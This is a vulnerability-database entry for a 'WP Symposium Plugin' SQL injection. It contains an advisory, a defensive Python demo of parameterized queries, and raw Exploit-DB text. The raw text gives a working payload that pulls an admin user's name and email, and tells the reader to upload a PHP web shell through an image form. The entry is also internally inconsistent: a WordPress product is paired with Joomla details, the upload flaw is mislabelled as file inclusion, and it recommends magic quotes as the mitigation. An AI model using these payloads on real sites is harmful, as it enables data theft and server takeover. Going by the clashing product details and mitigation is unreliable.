Vendor: WP Symposium Plugin
By: Hannes Trunde
CVSS: N/A
Severity: MEDIUM
Vulnerability: SQL Injection
CWE: 89
Product Name: WP Symposium Plugin
Affected Version From: 15.1
Affected Version To: 15.4
Patch Exists: NO
Related CVE: CVE-2015-3325
CPE: a:wordpress:wp_symposium_plugin
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2015

SQL Injection

The exploit involves injecting malicious SQL code into a new event's description. The code retrieves the username and email of a user with a specific group ID from the #__users table. The user ID must be provided as part of the exploit. The extracted information can be found on the View Events page.

Mitigation:

To mitigate this vulnerability, enable magic quotes and ensure user accounts have limited privileges.
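
The injection depends on a quote in the event description ending the string literal inside an INSERT statement, so binding the description as a parameter removes it whatever the magic quotes setting is. The following is an added example, not code from the plugin or from the original advisory, showing a concatenated INSERT beside its parameterized form. The schema, the function names and the sample rows are constructed assumptions, and SQLite stands in for the real database.

```python
import sqlite3

# Constructed schema and rows; table and column names are assumptions.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT, gid INTEGER);
CREATE TABLE events (owner_id INTEGER, title TEXT, description TEXT);
INSERT INTO users VALUES (1, 'admin', 'admin@example.test', 25);
INSERT INTO users VALUES (63, 'member', 'member@example.test', 18);
"""

# Constructed description with the shape of the page's string, adapted to
# this schema and to SQLite syntax (|| instead of CONCAT).
CRAFTED = ("'), (63, 'x', (SELECT username || ' ' || email "
           "FROM users WHERE gid=25 LIMIT 1)) -- ")

def new_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db

def add_event_concat(db, owner_id, title, description):
    """'Before': the description is pasted into the SQL text."""
    db.execute("INSERT INTO events (owner_id, title, description) "
               f"VALUES ({int(owner_id)}, '{title}', '{description}')")

def add_event_bound(db, owner_id, title, description):
    """'After': every value is bound, so quotes in it stay data."""
    db.execute("INSERT INTO events (owner_id, title, description) "
               "VALUES (?, ?, ?)", (owner_id, title, description))

def descriptions(db, owner_id):
    rows = db.execute("SELECT description FROM events "
                      "WHERE owner_id = ? ORDER BY rowid", (owner_id,))
    return [r[0] for r in rows]

def run(add_event):
    # Fresh database per run so the two variants do not affect each other.
    db = new_db()
    add_event(db, 63, "picnic", CRAFTED)
    return descriptions(db, 63)

if __name__ == "__main__":
    print("concatenated:", run(add_event_concat))
    print("bound:       ", run(add_event_bound))
```

With concatenation the single call creates two event rows, the second holding another user's data; with bound parameters it creates one row whose description is the submitted text, unchanged.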
Source

Exploit-DB raw data:

SQL Injection
-------------

requires: magic quotes OFF, user account

Add this as the description of a new event:

'), ( 63,(SELECT CONCAT(username,0x20,email) FROM #__users WHERE gid=25 
LIMIT 1),1,1,1) -- '

NOTE: 63 MUST be your Joomla user ID. Extracted info can be found on 
View Events page


Remote File Inclusion
---------------------

requires: user account

Just upload your PHP shell (shell.jpg.php) through the Add Image screen, 
and find its new URL in the View Images screen.